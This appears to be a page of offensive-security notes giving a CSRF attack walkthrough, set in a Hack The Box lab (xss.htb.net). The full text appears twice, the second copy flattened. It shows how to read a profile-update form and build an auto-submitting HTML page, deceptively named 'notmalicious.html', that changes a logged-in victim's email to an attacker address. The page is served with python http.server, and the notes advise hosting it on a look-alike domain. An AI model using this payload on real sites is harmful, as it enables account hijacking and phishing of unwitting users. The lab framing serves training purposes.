W/O ANTI-CSRF TOKEN

#compromise/access web pages
root@oco:~$ BROWSER > {targetSite:port}
 ...
 
 * once the accessed, review the source code to identify any forms that could be used
 
#study the web form of the site
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
  <form id="updateProfileForm" action="/api/update-profile" method="post">
    <div class="content" id="userProfileData">
      <div class="field is-small">
        <label class="label">Email</label>
          <div class="control">
  	    <input class="input" name="email" id="userProfileEmailInput" type="email">
	  </div>
	<label class="label">Telephone</label>
	  <div class="control">
	    <input class="input" name="telephone" id="userProfileTelInput" type="text">
	  </div>
	<label class="label">Country</label>
	  <div class="control">
	    <input class="input" name="country" id="userProfileCountryInput" type="text">
	  </div>
      </div>
    </div>
  </form>
 
 * pertinent info gathered from the source
    - action="/api/update-profile" method="post">
    - <input class="input" name="email" id="userProfileEmailInput" type="email">
    - <input class="input" name="telephone" id="userProfileTelInput" type="text">
    - <input class="input" name="country" id="userProfileCountryInput" type="text">

#craft payload
root@oco:~$ nano notmalicious.html

<html>
  <body>
    <form id="submitMe" action="http://xss.htb.net/api/update-profile" method="POST">
      <input type="hidden" name="email" value="attacker@htb.net" />
      <input type="hidden" name="telephone" value="&#40;227&#41;&#45;750&#45;8112" />
      <input type="hidden" name="country" value="CSRF_POC" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.getElementById("submitMe").submit()
    </script>
  </body>
</html>

#server the payload
root@oco:~$ python -m http.server 1337
 Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...

#expected target trigger
#assumption and expectation
# - target must be logged-in and authenticated to the non-malicious web page
# - the malicious html must resemble the non-malicious web page and served on a
#   domain that closely resembles the target web page visited by the victim for this to work
# - target web page vulnerability exists such as no anti-csrf protection or misconfigured anti-csrf protection

root@target:~$ BROWSER > http://{attackerSite:port}/notmalicious.html

 * the impact in this scenario is the integrity of the data where the victim's personal information has been modified simply by accessing another web page

PreviousTRIGGERS NextWITH ANTI-CSRF TOKEN (GET METHOD)

Last updated 1 month ago

#compromise/access web pages root@oco:~$ BROWSER > {targetSite:port} ... * once the accessed, review the source code to identify any forms that could be used #study the web form of the site root@oco:~$ BROWSER > {targetSite:port} > CTRL + U <form id="updateProfileForm" action="/api/update-profile" method="post"> <div class="content" id="userProfileData"> <div class="field is-small"> <label class="label">Email</label> <div class="control"> <input class="input" name="email" id="userProfileEmailInput" type="email"> </div> <label class="label">Telephone</label> <div class="control"> <input class="input" name="telephone" id="userProfileTelInput" type="text"> </div> <label class="label">Country</label> <div class="control"> <input class="input" name="country" id="userProfileCountryInput" type="text"> </div> </div> </div> </form> * pertinent info gathered from the source - action="/api/update-profile" method="post"> - <input class="input" name="email" id="userProfileEmailInput" type="email"> - <input class="input" name="telephone" id="userProfileTelInput" type="text"> - <input class="input" name="country" id="userProfileCountryInput" type="text">

#craft payload root@oco:~$ nano notmalicious.html <html> <body> <form id="submitMe" action="http://xss.htb.net/api/update-profile" method="POST"> <input type="hidden" name="email" value="attacker@htb.net" /> <input type="hidden" name="telephone" value="(227)-750-8112" /> <input type="hidden" name="country" value="CSRF_POC" /> <input type="submit" value="Submit request" /> </form> <script> document.getElementById("submitMe").submit() </script> </body> </html> #server the payload root@oco:~$ python -m http.server 1337 Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...

#expected target trigger #assumption and expectation # - target must be logged-in and authenticated to the non-malicious web page # - the malicious html must resemble the non-malicious web page and served on a # domain that closely resembles the target web page visited by the victim for this to work # - target web page vulnerability exists such as no anti-csrf protection or misconfigured anti-csrf protection root@target:~$ BROWSER > http://{attackerSite:port}/notmalicious.html * the impact in this scenario is the integrity of the data where the victim's personal information has been modified simply by accessing another web page